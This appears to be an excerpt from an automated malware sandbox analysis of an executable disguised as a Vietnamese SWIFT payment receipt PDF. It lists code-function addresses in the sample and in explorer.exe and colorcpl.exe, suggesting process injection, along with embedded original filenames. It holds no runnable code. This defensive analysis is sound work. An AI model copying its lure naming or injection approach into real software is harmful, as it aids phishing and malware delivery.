Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01294420	4_2_01294420
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A2446	4_2_012A2446
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129E4F6	4_2_0129E4F6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0770	4_2_011F0770
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01214750	4_2_01214750
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EC7C0	4_2_011EC7C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120C6E0	4_2_0120C6E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01206962	4_2_01206962
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012BA9A6	4_2_012BA9A6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F29A0	4_2_011F29A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F2840	4_2_011F2840
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FA840	4_2_011FA840
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011D68B8	4_2_011D68B8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0121E8F0	4_2_0121E8F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AAB40	4_2_012AAB40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A6BD7	4_2_012A6BD7
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EEA80	4_2_011EEA80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FAD00	4_2_011FAD00
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128CD1F	4_2_0128CD1F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01208DBF	4_2_01208DBF
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011EADE0	4_2_011EADE0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0C00	4_2_011F0C00
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290CB5	4_2_01290CB5
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0CF2	4_2_011E0CF2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01232F28	4_2_01232F28
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01210F30	4_2_01210F30
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01292F30	4_2_01292F30
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01264F40	4_2_01264F40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0126EFA0	4_2_0126EFA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E2FC8	4_2_011E2FC8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FCFE0	4_2_011FCFE0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AEE26	4_2_012AEE26
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0E59	4_2_011F0E59
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01202E90	4_2_01202E90
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012ACE93	4_2_012ACE93
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AEEDB	4_2_012AEEDB
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012BB16B	4_2_012BB16B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0122516C	4_2_0122516C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DF172	4_2_011DF172
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FB1B0	4_2_011FB1B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A70E9	4_2_012A70E9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AF0E0	4_2_012AF0E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F70C0	4_2_011F70C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129F0CC	4_2_0129F0CC
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A132D	4_2_012A132D
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011DD34C	4_2_011DD34C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0123739A	4_2_0123739A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F52A0	4_2_011F52A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012912ED	4_2_012912ED
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120B2C0	4_2_0120B2C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A7571	4_2_012A7571
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128D5B0	4_2_0128D5B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B95C3	4_2_012B95C3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AF43F	4_2_012AF43F
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E1460	4_2_011E1460
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AF7B0	4_2_012AF7B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01235630	4_2_01235630
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A16CC	4_2_012A16CC
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01285910	4_2_01285910
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F9950	4_2_011F9950
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120B950	4_2_0120B950
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0125D800	4_2_0125D800
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F38E0	4_2_011F38E0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AFB76	4_2_012AFB76
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120FB80	4_2_0120FB80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01265BF0	4_2_01265BF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0122DBF9	4_2_0122DBF9
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01263A6C	4_2_01263A6C
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AFA49	4_2_012AFA49
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A7A46	4_2_012A7A46
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01235AA0	4_2_01235AA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128DAAC	4_2_0128DAAC
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01291AA3	4_2_01291AA3
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0129DAC6	4_2_0129DAC6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A7D73	4_2_012A7D73
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F3D40	4_2_011F3D40
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A1D5A	4_2_012A1D5A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0120FDC0	4_2_0120FDC0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01269C32	4_2_01269C32
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AFCF2	4_2_012AFCF2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AFF09	4_2_012AFF09
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F1F92	4_2_011F1F92
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AFFB1	4_2_012AFFB1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F9EB0	4_2_011F9EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_10A51082	6_2_10A51082
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5A036	6_2_10A5A036
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5E5CD	6_2_10A5E5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_10A52D02	6_2_10A52D02
Source: C:\Windows\explorer.exe	Code function: 6_2_10A58912	6_2_10A58912
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5B232	6_2_10A5B232
Source: C:\Windows\explorer.exe	Code function: 6_2_10A55B30	6_2_10A55B30
Source: C:\Windows\explorer.exe	Code function: 6_2_10A55B32	6_2_10A55B32
Source: C:\Windows\explorer.exe	Code function: 6_2_1158F232	6_2_1158F232
Source: C:\Windows\explorer.exe	Code function: 6_2_1158C912	6_2_1158C912
Source: C:\Windows\explorer.exe	Code function: 6_2_11586D02	6_2_11586D02
Source: C:\Windows\explorer.exe	Code function: 6_2_11589B30	6_2_11589B30
Source: C:\Windows\explorer.exe	Code function: 6_2_11589B32	6_2_11589B32
Source: C:\Windows\explorer.exe	Code function: 6_2_115925CD	6_2_115925CD
Source: C:\Windows\explorer.exe	Code function: 6_2_1158E036	6_2_1158E036
Source: C:\Windows\explorer.exe	Code function: 6_2_11585082	6_2_11585082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200535	7_2_05200535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C0591	7_2_052C0591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A4420	7_2_052A4420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B2446	7_2_052B2446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052AE4F6	7_2_052AE4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200770	7_2_05200770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05224750	7_2_05224750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FC7C0	7_2_051FC7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521C6E0	7_2_0521C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F0100	7_2_051F0100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529A118	7_2_0529A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05288158	7_2_05288158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C01AA	7_2_052C01AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B41A2	7_2_052B41A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B81CC	7_2_052B81CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05292000	7_2_05292000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BA352	7_2_052BA352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C03E6	7_2_052C03E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520E3F0	7_2_0520E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A0274	7_2_052A0274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052802C0	7_2_052802C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520AD00	7_2_0520AD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529CD1F	7_2_0529CD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05218DBF	7_2_05218DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FADE0	7_2_051FADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200C00	7_2_05200C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A0CB5	7_2_052A0CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F0CF2	7_2_051F0CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05242F28	7_2_05242F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05220F30	7_2_05220F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A2F30	7_2_052A2F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05274F40	7_2_05274F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527EFA0	7_2_0527EFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520CFE0	7_2_0520CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F2FC8	7_2_051F2FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BEE26	7_2_052BEE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05200E59	7_2_05200E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05212E90	7_2_05212E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BCE93	7_2_052BCE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BEEDB	7_2_052BEEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05216962	7_2_05216962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052029A0	7_2_052029A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052CA9A6	7_2_052CA9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520A840	7_2_0520A840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05202840	7_2_05202840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051E68B8	7_2_051E68B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0522E8F0	7_2_0522E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BAB40	7_2_052BAB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B6BD7	7_2_052B6BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051FEA80	7_2_051FEA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7571	7_2_052B7571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529D5B0	7_2_0529D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052C95C3	7_2_052C95C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF43F	7_2_052BF43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F1460	7_2_051F1460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF7B0	7_2_052BF7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05245630	7_2_05245630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B16CC	7_2_052B16CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052CB16B	7_2_052CB16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523516C	7_2_0523516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051EF172	7_2_051EF172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0520B1B0	7_2_0520B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B70E9	7_2_052B70E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BF0E0	7_2_052BF0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052070C0	7_2_052070C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052AF0CC	7_2_052AF0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B132D	7_2_052B132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051ED34C	7_2_051ED34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0524739A	7_2_0524739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052052A0	7_2_052052A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A12ED	7_2_052A12ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521B2C0	7_2_0521B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7D73	7_2_052B7D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05203D40	7_2_05203D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B1D5A	7_2_052B1D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521FDC0	7_2_0521FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05279C32	7_2_05279C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFCF2	7_2_052BFCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFF09	7_2_052BFF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFFB1	7_2_052BFFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05201F92	7_2_05201F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C3FD5	7_2_051C3FD5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C3FD2	7_2_051C3FD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05209EB0	7_2_05209EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05295910	7_2_05295910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05209950	7_2_05209950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521B950	7_2_0521B950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0526D800	7_2_0526D800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052038E0	7_2_052038E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFB76	7_2_052BFB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0521FB80	7_2_0521FB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05275BF0	7_2_05275BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0523DBF9	7_2_0523DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05273A6C	7_2_05273A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052BFA49	7_2_052BFA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B7A46	7_2_052B7A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05245AA0	7_2_05245AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529DAAC	7_2_0529DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A1AA3	7_2_052A1AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052ADAC6	7_2_052ADAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03282FB0	7_2_03282FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03289E60	7_2_03289E60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329EDAD	7_2_0329EDAD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03282D87	7_2_03282D87
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03282D90	7_2_03282D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050CA036	7_2_050CA036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C2D02	7_2_050C2D02
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050CE5CD	7_2_050CE5CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C8912	7_2_050C8912
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C1082	7_2_050C1082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C5B30	7_2_050C5B30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C5B32	7_2_050C5B32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050CB232	7_2_050CB232

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: String function: 01225130 appears 58 times
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: String function: 0125EA12 appears 86 times
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: String function: 011DB970 appears 280 times
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: String function: 01237E54 appears 111 times
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: String function: 0126F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0526EA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0527F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 051EB970 appears 280 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 05247E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 05235130 appears 58 times

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2163845733.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2175662094.0000000007D80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2160311993.000000000124E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000002.2179265465.000000000D470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000000.00000000.2099848272.0000000000A82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebiRh.exeF vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2231174141.00000000015A3000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2228754932.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2229987491.00000000012DD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Binary or memory string: OriginalFilenamebiRh.exeF vs Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

